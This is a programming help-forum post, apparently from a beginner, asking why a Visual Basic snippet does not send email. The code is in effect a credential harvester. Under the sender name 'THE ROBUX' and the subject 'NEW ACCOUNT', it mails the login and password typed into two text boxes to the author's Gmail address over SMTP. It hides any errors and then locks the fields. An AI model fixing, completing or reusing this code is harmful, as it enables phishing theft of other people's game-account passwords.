# Can't send a mail in visual basic

Tags: visual-studio-2010

```
Imports System.Net.Mail


        Try
            Dim MySubject As String = "NEW ACCOUNT"
            Dim MyMessageBody As String = ("Login: " & TextBox1.Text & " Pass: " & TextBox2.Text)
            Dim RecipientEmail As String = "@gmail.com"
            Dim SenderEmail As String = "@gmail.com"
            Dim SenderDisplayName As String = "THE ROBUX"
            Dim SenderEmailPassword As String = "Password"
            Dim HOST = "smtp.gmail.com"
            Dim PORT = "587" 'TLS Port

            Dim mail As New MailMessage
            mail.Subject = MySubject
            mail.Body = MyMessageBody
            mail.To.Add(RecipientEmail)
            mail.From = New MailAddress(SenderEmail, SenderDisplayName)

            Dim SMTP As New SmtpClient(HOST)
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential(SenderEmail.Trim(), SenderEmailPassword.Trim())
            SMTP.DeliveryMethod = SmtpDeliveryMethod.Network
            SMTP.Port = PORT
            SMTP.Send(mail)
            'MsgBox("Sent Message To : " & RecipientEmail, MsgBoxStyle.Information, "Sent!")
        Catch ex As Exception
            'MsgBox(ex.ToString)
        End Try
        Timer1.Enabled = True
        Timer1.Start()
        Timer1.Interval = 1000 ' = 1min
        TextBox1.Enabled = False
        TextBox2.Enabled = False
```

I tried a lot of things on the internet but didn't find what I wanted. It doesn't even send the mail. I'm just starting in developping in VB